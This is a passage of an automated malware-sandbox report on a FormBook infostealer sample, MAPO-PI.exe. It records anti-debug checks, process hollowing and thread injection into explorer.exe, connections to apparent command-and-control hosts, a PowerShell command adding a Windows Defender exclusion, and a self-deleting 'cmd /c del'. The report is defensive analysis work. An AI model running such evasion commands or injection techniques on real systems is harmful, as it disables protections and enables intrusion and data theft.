          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE6DC9 mov eax, dword ptr fs:[00000030h]16_2_04CE6DC9
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D18DF1 mov eax, dword ptr fs:[00000030h]16_2_04D18DF1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h]16_2_04C7D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7D5E0 mov eax, dword ptr fs:[00000030h]16_2_04C7D5E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]16_2_04D2FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]16_2_04D2FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]16_2_04D2FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2FDE2 mov eax, dword ptr fs:[00000030h]16_2_04D2FDE2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]16_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]16_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]16_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C92581 mov eax, dword ptr fs:[00000030h]16_2_04C92581
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]16_2_04C62D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]16_2_04C62D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]16_2_04C62D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]16_2_04C62D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C62D8A mov eax, dword ptr fs:[00000030h]16_2_04C62D8A
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h]16_2_04C9FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9FD9B mov eax, dword ptr fs:[00000030h]16_2_04C9FD9B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C935A1 mov eax, dword ptr fs:[00000030h]16_2_04C935A1
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h]16_2_04C91DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h]16_2_04C91DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C91DB5 mov eax, dword ptr fs:[00000030h]16_2_04C91DB5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h]16_2_04D305AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D305AC mov eax, dword ptr fs:[00000030h]16_2_04D305AC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA3D43 mov eax, dword ptr fs:[00000030h]16_2_04CA3D43
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE3540 mov eax, dword ptr fs:[00000030h]16_2_04CE3540
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D13D40 mov eax, dword ptr fs:[00000030h]16_2_04D13D40
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C87D50 mov eax, dword ptr fs:[00000030h]16_2_04C87D50
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h]16_2_04C8C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8C577 mov eax, dword ptr fs:[00000030h]16_2_04C8C577
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38D34 mov eax, dword ptr fs:[00000030h]16_2_04D38D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2E539 mov eax, dword ptr fs:[00000030h]16_2_04D2E539
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h]16_2_04C94D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h]16_2_04C94D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C94D3B mov eax, dword ptr fs:[00000030h]16_2_04C94D3B
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C73D34 mov eax, dword ptr fs:[00000030h]16_2_04C73D34
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6AD30 mov eax, dword ptr fs:[00000030h]16_2_04C6AD30
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CEA537 mov eax, dword ptr fs:[00000030h]16_2_04CEA537
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D38ED6 mov eax, dword ptr fs:[00000030h]16_2_04D38ED6
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C936CC mov eax, dword ptr fs:[00000030h]16_2_04C936CC
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA8EC7 mov eax, dword ptr fs:[00000030h]16_2_04CA8EC7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FEC0 mov eax, dword ptr fs:[00000030h]16_2_04D1FEC0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C776E2 mov eax, dword ptr fs:[00000030h]16_2_04C776E2
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C916E0 mov ecx, dword ptr fs:[00000030h]16_2_04C916E0
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CFFE87 mov eax, dword ptr fs:[00000030h]16_2_04CFFE87
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE46A7 mov eax, dword ptr fs:[00000030h]16_2_04CE46A7
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h]16_2_04D30EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h]16_2_04D30EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D30EA5 mov eax, dword ptr fs:[00000030h]16_2_04D30EA5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]16_2_04C77E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]16_2_04C77E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]16_2_04C77E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]16_2_04C77E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]16_2_04C77E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C77E41 mov eax, dword ptr fs:[00000030h]16_2_04C77E41
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h]16_2_04D2AE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D2AE44 mov eax, dword ptr fs:[00000030h]16_2_04D2AE44
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7766D mov eax, dword ptr fs:[00000030h]16_2_04C7766D
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]16_2_04C8AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]16_2_04C8AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]16_2_04C8AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]16_2_04C8AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C8AE73 mov eax, dword ptr fs:[00000030h]16_2_04C8AE73
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h]16_2_04C6C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h]16_2_04C6C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6C600 mov eax, dword ptr fs:[00000030h]16_2_04C6C600
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C98E00 mov eax, dword ptr fs:[00000030h]16_2_04C98E00
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h]16_2_04C9A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C9A61C mov eax, dword ptr fs:[00000030h]16_2_04C9A61C
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D21608 mov eax, dword ptr fs:[00000030h]16_2_04D21608
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C6E620 mov eax, dword ptr fs:[00000030h]16_2_04C6E620
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04D1FE3F mov eax, dword ptr fs:[00000030h]16_2_04D1FE3F
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CA37F5 mov eax, dword ptr fs:[00000030h]16_2_04CA37F5
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C78794 mov eax, dword ptr fs:[00000030h]16_2_04C78794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h]16_2_04CE7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h]16_2_04CE7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04CE7794 mov eax, dword ptr fs:[00000030h]16_2_04CE7794
          Source: C:\Windows\SysWOW64\cmmon32.exeCode function: 16_2_04C7EF40 mov eax, dword ptr fs:[00000030h]16_2_04C7EF40
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess queried: DebugPortJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess queried: DebugPortJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeCode function: 3_2_0040ACC0 LdrLoadDll,3_2_0040ACC0
          Source: C:\Users\user\Desktop\MAPO-PI.exeMemory allocated: page read and write | page guardJump to behavior

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeNetwork Connect: 159.65.10.143 80Jump to behavior
          Source: C:\Windows\explorer.exeDomain query: www.lifeinformpodcast.com
          Source: C:\Windows\explorer.exeDomain query: www.transforming-leadership.com
          Source: C:\Windows\explorer.exeDomain query: www.diofis.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80Jump to behavior
          Source: C:\Windows\explorer.exeNetwork Connect: 109.232.217.55 80Jump to behavior
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: 8B0000Jump to behavior
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeSection loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read writeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and writeJump to behavior
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread APC queued: target process: C:\Windows\explorer.exeJump to behavior
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeThread register set: target process: 3472Jump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeThread register set: target process: 3472Jump to behavior
          Adds a directory exclusion to Windows DefenderShow sources
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\MAPO-PI.exe'Jump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeProcess created: C:\Users\user\Desktop\MAPO-PI.exe C:\Users\user\Desktop\MAPO-PI.exeJump to behavior
          Source: C:\Windows\SysWOW64\cmmon32.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\MAPO-PI.exe'Jump to behavior
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: SProgram Managerl
          Source: explorer.exe, 00000004.00000000.240240784.0000000001128000.00000004.00000020.sdmpBinary or memory string: ProgmanOMEa
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd,
          Source: explorer.exe, 00000004.00000000.255793151.0000000001640000.00000002.00020000.sdmp, cmmon32.exe, 00000010.00000002.496245759.0000000003360000.00000002.00020000.sdmpBinary or memory string: Progmanlock
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Users\user\Desktop\MAPO-PI.exe VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-ds-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-base-Package~31bf3856ad364e35~amd64~en-US~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Windows-Defender-Management-Powershell-Group-WOW64-Package~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
          Source: C:\Users\user\Desktop\MAPO-PI.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

          Stealing of Sensitive Information:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.6.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.2.MAPO-PI.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.8.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 3.0.MAPO-PI.exe.400000.4.unpack, type: UNPACKEDPE
